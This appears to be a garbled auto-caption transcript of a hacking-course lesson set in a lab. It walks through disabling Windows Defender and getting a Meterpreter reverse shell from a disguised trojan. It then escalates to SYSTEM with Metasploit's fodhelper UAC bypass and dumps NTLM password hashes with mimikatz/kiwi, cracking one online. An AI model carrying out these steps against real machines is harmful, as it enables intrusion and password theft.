1 00:00:03,120 --> 00:00:08,880 Welcome back to our last lesson on the command and control of a Windows 10 machine from Kalli. 2 00:00:09,240 --> 00:00:16,320 In this lesson, we're going to see how to gain admen level privileges or system level privileges and 3 00:00:16,320 --> 00:00:20,970 how to steal passwords from a Windows 10 computer. 4 00:00:21,270 --> 00:00:24,480 So one of the first things we want to do is come over to our Windows 10 computer. 5 00:00:24,870 --> 00:00:29,370 And if you still have your administrator command prompt up, go ahead and open that. 6 00:00:29,400 --> 00:00:36,710 If you don't just do see M.D. in your Windows 10 box and run as administrator, you should get something, 7 00:00:36,730 --> 00:00:39,540 says the administrator command prompt. 8 00:00:40,140 --> 00:00:42,750 And what we want to do is add a few users. 9 00:00:43,260 --> 00:00:46,850 So we've seen how to get just one user name. 10 00:00:47,430 --> 00:00:48,480 A couple of different ways, right? 11 00:00:48,510 --> 00:00:50,640 You can right click and you can grab that password. 12 00:00:51,030 --> 00:00:52,410 You can right. 13 00:00:52,410 --> 00:00:53,850 Click, inspect and grab that password. 14 00:00:54,180 --> 00:01:00,930 You can use the social engineers tool kit to send a phishing email to a person over the Internet and 15 00:01:00,930 --> 00:01:03,070 get their username and password that way. 16 00:01:03,540 --> 00:01:05,580 But that's one password at a time. 17 00:01:05,670 --> 00:01:11,760 What we're going to see with Materne Critter is how to download all of the user accounts on a computer. 18 00:01:12,150 --> 00:01:16,740 Now, if that's your office computer, it may only have you in a couple of other people, an I.T. person 19 00:01:16,740 --> 00:01:17,610 or something like that. 20 00:01:17,970 --> 00:01:24,570 If you're talking about a library or a school computer or a computer that's used by lots of different 21 00:01:24,570 --> 00:01:28,650 people, you may get dozens of passwords from a single infected Windows P.C.. 22 00:01:29,010 --> 00:01:29,910 We're going to see how to do that. 23 00:01:29,910 --> 00:01:33,510 But to to get the most out of it, let's go and create a few accounts. 24 00:01:33,810 --> 00:01:37,530 So from an administrative command, prompt type net user. 25 00:01:38,060 --> 00:01:46,410 And let's just make up a few user names like Anna and give her a password of password one and then say 26 00:01:46,410 --> 00:01:47,640 slash add. 27 00:01:49,170 --> 00:01:49,590 Good. 28 00:01:49,980 --> 00:01:55,830 We'll do a net user ban with a little more complex password. 29 00:01:55,890 --> 00:02:01,670 Maybe BP a SSW zero r d exclamation. 30 00:02:02,340 --> 00:02:05,430 We already know that one from our Windows user. 31 00:02:06,360 --> 00:02:10,360 We can do net user, Carol. 32 00:02:11,220 --> 00:02:13,110 And let's make it a little longer. 33 00:02:13,110 --> 00:02:14,100 Password maybe. 34 00:02:14,160 --> 00:02:18,630 Captain Marvel slash ad. 35 00:02:18,960 --> 00:02:24,930 So what we're doing is adding users net user, the user name and the password slash ad will set up a 36 00:02:24,930 --> 00:02:26,910 new user on your Windows 10 box. 37 00:02:26,940 --> 00:02:28,950 And we'll add just a couple more. 38 00:02:28,980 --> 00:02:37,290 Let's do net user Clark with Super Man 20 as his password slash ad. 39 00:02:37,740 --> 00:02:42,540 You can choose fictional characters, you can choose superheroes, whatever you like for your passwords 40 00:02:42,540 --> 00:02:42,810 here. 41 00:02:43,250 --> 00:02:48,300 Net user CARRA with Supergirl. 42 00:02:50,280 --> 00:02:52,530 Girl number seven. 43 00:02:52,950 --> 00:03:00,640 And an exclamation mark slash ad and then maybe one net user, Peter. 44 00:03:01,240 --> 00:03:04,170 Spider-Man Rules. 45 00:03:04,430 --> 00:03:07,200 Spider Man Rule WSA. 46 00:03:08,010 --> 00:03:10,500 And then a smiley face after slash ad. 47 00:03:12,090 --> 00:03:17,040 So I've added five or six passwords that will oh, this is an interesting one. 48 00:03:17,430 --> 00:03:21,150 Good old Windows will say, hey, wait, this password is longer. 49 00:03:21,150 --> 00:03:23,390 The 14 characters, which is a really good thing. 50 00:03:23,730 --> 00:03:29,940 But if you're using any old network computers or Windows 2000 or older, which you usually don't have 51 00:03:29,940 --> 00:03:31,830 to worry about in the year 2020 and beyond. 52 00:03:32,290 --> 00:03:36,870 We're going to say, yes, we do want to continue to create that user. 53 00:03:37,470 --> 00:03:41,820 So we've got several usernames and passwords that we'll be able to try to attack from the Caleigh box. 54 00:03:41,850 --> 00:03:47,190 Now, one thing that's happened here is my Caleigh machine has lost the Materne Fritter session. 55 00:03:47,580 --> 00:03:51,780 So after you've created those handful passwords, let's come back over to Caleigh for just a second. 56 00:03:53,290 --> 00:03:57,250 If you've still got your maturity's session up and running, then you're ready to run. 57 00:03:57,280 --> 00:03:59,880 You don't have to redo this, but this is a useful thing to see. 58 00:03:59,890 --> 00:04:07,270 We were running the the Web cam stream just a moment ago, and that definitely can take up a lot of 59 00:04:07,270 --> 00:04:09,280 bandwidth and cause things to crash. 60 00:04:09,640 --> 00:04:16,540 So I'm still in my expert multi handler, and I should still have all my options, show options. 61 00:04:17,620 --> 00:04:20,620 So my local sent out to an at seven is still listening. 62 00:04:20,650 --> 00:04:22,370 So I'm just going to say exploit again. 63 00:04:24,380 --> 00:04:24,680 Good. 64 00:04:24,710 --> 00:04:25,610 And it's listening. 65 00:04:26,090 --> 00:04:31,520 I'll come back over to my Windows box and I'm going to check to see if it might have woken up. 66 00:04:31,550 --> 00:04:32,350 And it did. 67 00:04:32,390 --> 00:04:34,760 Delete that fortnight, all scans. 68 00:04:34,760 --> 00:04:37,730 But look at my documents folder and copy that. 69 00:04:37,980 --> 00:04:44,180 And I'm actually going to copy that and paste it into my downloads folder because I don't want it. 70 00:04:44,870 --> 00:04:45,680 Hey, there we go. 71 00:04:45,920 --> 00:04:52,640 I don't want it to delete my original copy, but you saw something pop up from my Windows Defender antivirus 72 00:04:52,640 --> 00:04:53,360 settings. 73 00:04:54,700 --> 00:04:55,570 Yeah, there we go. 74 00:04:55,960 --> 00:04:59,110 My antivirus sitting says Windows Defender Antivirus found threats. 75 00:04:59,140 --> 00:05:01,300 Well, we turned off Windows Defender antivirus. 76 00:05:01,600 --> 00:05:02,720 It turns back on. 77 00:05:02,740 --> 00:05:05,560 That's a great thing for Windows, Windows 10 and beyond. 78 00:05:05,920 --> 00:05:09,400 We got threat protection that turns back on for us. 79 00:05:09,700 --> 00:05:11,040 So you need to say virus. 80 00:05:12,300 --> 00:05:15,190 And threat protection, we're going to open those settings. 81 00:05:18,880 --> 00:05:21,250 We're going to come down to the Manege settings. 82 00:05:22,980 --> 00:05:26,700 And we're going to turn off the Real-Time prediction more time this happens from time to time. 83 00:05:27,000 --> 00:05:32,100 It's actually a great thing that Windows has made this change because it keeps your device a little 84 00:05:32,100 --> 00:05:33,090 more well protected. 85 00:05:33,090 --> 00:05:39,090 If you had to turn it off to play a certain video game or to stream something, you you will wind up 86 00:05:39,090 --> 00:05:40,560 having to turn it off a couple of times. 87 00:05:40,590 --> 00:05:46,080 But it is worth it because you've seen what can happen if you don't have that virus in threat protection 88 00:05:46,080 --> 00:05:46,410 running. 89 00:05:46,860 --> 00:05:50,940 So now we're going to go to our documents folder where we ran an exception. 90 00:05:50,960 --> 00:05:53,730 Remember, in the previous section and we can copy that. 91 00:05:53,760 --> 00:05:56,130 We can bring it over to the downloads pasted again. 92 00:05:56,550 --> 00:06:00,540 And this time since we turned off the Real-Time protection, it doesn't catch it. 93 00:06:00,630 --> 00:06:03,420 We're going to run that fortnight, all scans. 94 00:06:04,050 --> 00:06:04,950 And look at this. 95 00:06:04,980 --> 00:06:07,540 We opened a session to over here and. 96 00:06:08,370 --> 00:06:09,270 So that's a great thing. 97 00:06:09,540 --> 00:06:13,770 Well, now that we've got a maternity section connected again to our Windows machine, or if you've 98 00:06:13,860 --> 00:06:15,630 already got yours connected, you're in good shape. 99 00:06:15,930 --> 00:06:22,330 What we're going to do is type background one more time because we're actually going to use that Materne 100 00:06:22,330 --> 00:06:26,160 printer session to inject something called privilege escalation. 101 00:06:26,550 --> 00:06:35,280 We're going to use the a feature inside Windows 10 to gain route access or system level access to our 102 00:06:35,280 --> 00:06:38,100 Windows 10 computer so that we can actually still those passwords. 103 00:06:38,490 --> 00:06:52,590 So the exploit for that now control L is use exploit slash windows slash local slash bypass UAC underscore 104 00:06:52,590 --> 00:06:55,510 fied features on demand helper. 105 00:06:56,790 --> 00:06:57,180 Who. 106 00:06:57,270 --> 00:06:58,860 Now that is a long command. 107 00:06:59,010 --> 00:07:06,540 I know but we're gonna use exploit slash windows slash local slash bypass UAC that will bypass the user 108 00:07:06,540 --> 00:07:13,200 account controls that usually keep you from getting access to these important things like passwords 109 00:07:13,500 --> 00:07:20,100 for other users and the features on Demand Help or The Fired Helper is a program on Windows 10 that's 110 00:07:20,430 --> 00:07:22,290 there for a useful purpose. 111 00:07:22,320 --> 00:07:23,550 But it can be misused. 112 00:07:23,550 --> 00:07:26,790 And you can see here how Kelly's gonna do that. 113 00:07:27,030 --> 00:07:31,140 So if I say sessions, I need to know which session I want to attack. 114 00:07:31,170 --> 00:07:36,360 And that session to over here, you can see on the left hand side, if you're still on your first session, 115 00:07:36,360 --> 00:07:37,500 you may have session one. 116 00:07:37,900 --> 00:07:44,010 We're going to set the session to two or one or whatever. 117 00:07:44,010 --> 00:07:47,040 Your session number is going to set the payload. 118 00:07:48,430 --> 00:07:57,520 Two windows slash materne critter slash reverse underscore TCAP. 119 00:07:58,630 --> 00:08:05,560 So we're gonna make use of that Materne critter connection and we're going to inject another Materne 120 00:08:05,560 --> 00:08:08,440 critter section, but this one is gonna be at a higher level of privilege. 121 00:08:08,740 --> 00:08:11,280 We need to set the local host just like we did before. 122 00:08:11,290 --> 00:08:16,360 L host to 10 Dotto dot nine. 123 00:08:16,360 --> 00:08:18,310 Dot seven is my Caleigh box. 124 00:08:18,310 --> 00:08:26,590 You can IPA if you need to get the IP address and then we want to run exploit and I will try to start 125 00:08:26,590 --> 00:08:27,580 a reverse handler. 126 00:08:28,150 --> 00:08:37,360 And you saw something flash up on the screen there in my Windows 10 box, but nothing terribly out of 127 00:08:37,360 --> 00:08:39,160 the ordinary for a regular user. 128 00:08:39,620 --> 00:08:44,980 But if this works correctly, you should have a new Materne Fritter session opened up. 129 00:08:45,370 --> 00:08:49,060 And this session is not going to be your regular old user session. 130 00:08:49,060 --> 00:08:52,400 This is an administrative or system level user. 131 00:08:52,420 --> 00:08:54,020 Once we escalate those privileges. 132 00:08:54,490 --> 00:08:56,980 So it created a third session. 133 00:08:56,980 --> 00:09:00,160 So now and now we have, well, at least a second session. 134 00:09:00,580 --> 00:09:01,870 We had an original session. 135 00:09:01,870 --> 00:09:04,030 It closed out, so we connected with a second session. 136 00:09:04,300 --> 00:09:09,340 We use the second session with a background to then bypass the user account control. 137 00:09:09,640 --> 00:09:14,800 And now we'll have the ability to get system level access on this Windows team computer. 138 00:09:16,220 --> 00:09:22,580 So I'm going to use control l and I'm going to use the command get system. 139 00:09:23,950 --> 00:09:26,710 And let's see if we can get system level access. 140 00:09:26,750 --> 00:09:28,200 Well, it says it got system. 141 00:09:28,240 --> 00:09:33,550 The a technique one, by the way, if you get an error here that says it's already at an elevated state, 142 00:09:33,560 --> 00:09:35,920 that means you are already in an administrative account. 143 00:09:36,310 --> 00:09:37,150 And that's OK. 144 00:09:37,330 --> 00:09:38,650 The on command should work. 145 00:09:38,950 --> 00:09:43,690 If you didn't get a new maternity or section, you may have to actually go back and rerun the entire 146 00:09:43,690 --> 00:09:44,800 exploit one more time. 147 00:09:45,160 --> 00:09:52,210 So start back and see if you can get a session, then background that session, then connect using the 148 00:09:52,330 --> 00:09:53,650 third helper exploit. 149 00:09:54,850 --> 00:10:01,180 Just go back to the beginning of this, this video one more time after get a system we can check to 150 00:10:01,180 --> 00:10:05,790 see if we really do have system little access with get you I.D.. 151 00:10:07,100 --> 00:10:09,200 And look at our user name now. 152 00:10:09,590 --> 00:10:11,330 And we were just i.e. user. 153 00:10:11,390 --> 00:10:16,760 Earlier, we saw that a couple of times, but the user name now is TE Authority system. 154 00:10:16,760 --> 00:10:19,880 We are root level on this windows in teh box. 155 00:10:20,150 --> 00:10:23,570 So we're gonna use a package called Kiwi. 156 00:10:25,550 --> 00:10:32,720 There we go, this is called Mimi Katz, you loda by saying use Kiwi and then the command to dump all 157 00:10:32,720 --> 00:10:34,790 of our Windows passwords as L. 158 00:10:34,790 --> 00:10:38,360 S a underscored dump underscore Sam. 159 00:10:40,040 --> 00:10:41,840 Look at that. 160 00:10:42,230 --> 00:10:44,490 We have hashes for each one of our users. 161 00:10:44,510 --> 00:10:46,790 Now, these are not the plain text passwords. 162 00:10:47,180 --> 00:10:49,070 These are just the user hashes. 163 00:10:49,100 --> 00:10:53,720 But let's choose Anna's password, that in TLM hash. 164 00:10:54,440 --> 00:11:02,280 If we control shift C to copy that, we can come out to a service like Hash Killer and come a hash killer 165 00:11:02,280 --> 00:11:11,150 dot io, come to the hash cracker, come down to n TLM, paste that hash that we just found. 166 00:11:12,140 --> 00:11:13,910 And then usually you'll have to do a captcha. 167 00:11:14,330 --> 00:11:20,330 UW six T for H g. 168 00:11:21,360 --> 00:11:25,440 And we're going to learn how to do password cracking in a later section. 169 00:11:25,770 --> 00:11:30,480 But this is a great way to check to see if you've got a real Windows password that you might be able 170 00:11:30,480 --> 00:11:31,020 to crack. 171 00:11:31,470 --> 00:11:33,870 And look at that. 172 00:11:33,990 --> 00:11:35,350 I may need to control. 173 00:11:35,600 --> 00:11:44,430 Plus, if you see that password, that hash has been resolved to password one. 174 00:11:45,650 --> 00:11:48,740 So we actually got into a Windows computer guy now. 175 00:11:49,100 --> 00:11:56,780 Really great idea would be to highlight and copy all of these hashes and just right click copy the selection 176 00:11:57,350 --> 00:12:04,600 and open up maybe a text document under favorites, text editor and paste these into that text document. 177 00:12:04,610 --> 00:12:09,410 You'll want to clean these up so that they've got just the username and the hash probably. 178 00:12:10,130 --> 00:12:17,930 But with just these hashes and a couple of free online tools like hash killer or hashes dot com where 179 00:12:17,930 --> 00:12:23,750 you can paste in a hash and see if that password has already been cracked out on the Internet, you're 180 00:12:23,750 --> 00:12:28,190 probably going to be able to recover most of the passwords that are on a Windows computer. 181 00:12:29,000 --> 00:12:37,160 So I think we probably did our job in scaring you into never downloading and running a suspicious file, 182 00:12:37,460 --> 00:12:41,690 whether it's from a friend, whether it's from somebody pretending to be a friend, whether it's just 183 00:12:41,690 --> 00:12:46,640 from a Web site or even if you're just downloading something you think you're getting for free. 184 00:12:47,360 --> 00:12:51,860 The latest movie that you're downloading is free from a Web site to watch the whole movie. 185 00:12:52,790 --> 00:12:54,350 It's not just executable files. 186 00:12:54,380 --> 00:12:55,820 It's PDAF files. 187 00:12:55,820 --> 00:12:56,750 It's Web pages. 188 00:12:57,110 --> 00:13:03,890 It could even be movie files or image files that are infected with viruses almost exactly like this 189 00:13:03,890 --> 00:13:11,540 remote access Trojan that we called Materne Critter that gave us complete command and control of a Windows 190 00:13:11,540 --> 00:13:14,120 computer from Alcalay Linux box. 191 00:13:14,510 --> 00:13:19,520 So when we come back in the next lesson, we're going to wrap up the commanding control with some ways 192 00:13:19,520 --> 00:13:24,050 to protect yourself from viruses like the one we just created. 193 00:13:24,350 --> 00:13:25,520 We'll see you in the next lesson.